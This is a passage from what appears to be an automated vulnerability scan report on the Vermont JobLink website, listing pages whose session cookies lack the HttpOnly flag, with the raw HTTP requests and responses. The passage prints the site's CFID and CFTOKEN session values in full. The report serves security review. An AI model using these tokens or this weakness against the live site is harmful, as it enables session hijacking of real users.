PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.225. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/documents/privacy.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:52 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.226. https://www.vermontjoblink.com/ada/customization/Vermont/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/customization/Vermont/favicon.ico HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:06:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
location: /ada/404/404_qry.cfm
Content-Type: text/html; charset=UTF-8

<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->

14.227. https://www.vermontjoblink.com/ada/default.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/default.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/default.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.228. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/etp/etp_newuser_dsp.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/etp/etp_newuser_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:58 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:11:56'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.229. https://www.vermontjoblink.com/ada/leavesite.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/leavesite.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/leavesite.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.230. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_eligibility_dsp.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_eligibility_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.231. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_forgotpass.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:07:29 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.232. https://www.vermontjoblink.com/ada/mn_login_fnc.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_login_fnc.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_login_fnc.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:14:18 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
location: /ada
Content-Type: text/html; charset=UTF-8

<!-- vermontjoblink --><!-- vjlpub --><!-- URL validated --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->

14.233. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_offices_dsp.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_offices_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:58 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

14.234. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_protectyourself_dsp.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_protectyourself_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:20 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
